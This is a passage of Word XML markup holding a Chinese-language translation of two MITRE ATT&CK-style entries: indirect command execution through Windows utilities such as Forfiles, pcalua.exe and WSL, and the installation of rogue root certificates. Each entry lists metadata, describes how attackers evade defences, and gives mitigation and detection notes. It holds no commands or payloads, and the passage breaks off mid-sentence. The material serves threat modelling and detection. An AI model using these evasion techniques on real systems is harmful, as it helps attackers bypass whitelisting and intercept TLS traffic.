      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="1453891A" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8181" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B782B6D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1202</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C26EDAF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>防御逃逸</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C793183" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="206D2763" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>所需权限：用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="168CCEAB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>监控，进程监控，进程命令行参数，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>indows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>事件日志</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32E13776" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>绕过的防御：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>静态文件分析、应用白名单、进程白名单、文件名或路径白名单</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05196C55" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Matthew Demaske</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Adaptforward</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B5DB0C7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="63BF76DF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43402D57" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以使用各种</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>indows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实用程序来执行命令，而不需要调</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6363">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:hyperlink r:id="rId111" w:history="1">
        <w:r w:rsidRPr="00AF6363">
          <w:t>cmd</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AF6363">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。例如，</w:t>
      </w:r>
      <w:hyperlink r:id="rId112" w:history="1">
        <w:r w:rsidRPr="00AF6363">
          <w:t>Forfiles</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AF6363">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序兼容性助手（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pcalua.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）、</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>WSL</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>Windows Subsystem for Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）组件以及其他实用程序可以从命令行界面、运行窗口或通过脚本来调用程序和命令的执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101844C4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会滥用这些功能来规避防御，尤其是在破坏检测和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或缓解控制（如组策略）的同时执行任意</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>动作</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>这</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>些控制限制</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>阻止</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6363">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>了</w:t>
      </w:r>
      <w:hyperlink r:id="rId113" w:history="1">
        <w:r w:rsidRPr="00AF6363">
          <w:t>cmd</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AF6363">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或恶意负载相</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关文件扩展名的使用。）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E12C4BC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01121640" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种类型的攻击技术基于系统功能的滥用，无法通过预防性控制来轻松缓解其造成的影响。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEC4056" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6CE7BA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控和分析基于主机的检测机制（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>Sysmon</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）中的日志来查看事件</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>，比如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>是否有进程创建</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>事件（创建</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>过程中使用了</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数来调用程序</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或生成子进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络连接，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>或者</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>创建</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>由这些参数导致的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C02B0A8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>根证书</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1555" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8181"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="40597E93" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8181" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E401CB6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1130</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C9A3960" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>防御逃逸</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5397E7BF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05A27C5B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>所需权限：管理员，用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45896D19" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>SSL/TLS</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检查，数字证书日志</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="442B4135" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>绕过的防御：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数字证书验证</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A716206" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Itzik Kotler</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>SafeBreach</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Travis Smith</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Tripwire</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Red Canary</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Matt Graeber</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>@mattifestation</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>SpecterOps</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7ACA5CDD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4459A3A5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DE7CD67" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根证书在公钥加密中用于标识根证书颁发机构（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CA</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。安装根证书后，系统或应用将信任根证书签名的根信任链中的证书。证书通常用于在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>浏览器中建立安全的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>TLS</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>SSL</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通信。当用户试图浏览提供不受信任证书的网站时，将显示一条错误消息，警告用户存在安全风险。根据安全设置，浏览器可能不允许用户建立与该网站的连接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BFC7CE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>可能会通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在其入侵的系统上安装根证书的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>方式</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来降低该系统安全性。攻击者已使用这种技术来避免在入侵系统通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>HTTPS</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接到攻击者控制的网络服务器时（攻击者用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>这些</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器来欺骗合法网站从而收集用户登录凭据）给</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>用户</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>警告提示</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。制造商在系统或软件供应链中也预先安装了非典型根证书。如果这些</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>非典型根证书</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与恶意软件</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>广告软件一起使用，会给中间人提供拦截</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>LS</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>SSL</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传输信息的能力。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5860E614" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根证书（及其关联的链）也可以克隆和重新安装。克隆的证书链将携带许多与源根证书相同的元数据特征，并可用于对恶意代码进行签名。签名</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>后，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这些恶意代码可能会绕过签名验证工具（例如：</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>Sysinternals</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>antivirus</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等）。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>签名</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>验证</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>工具</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用于阻止执行和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
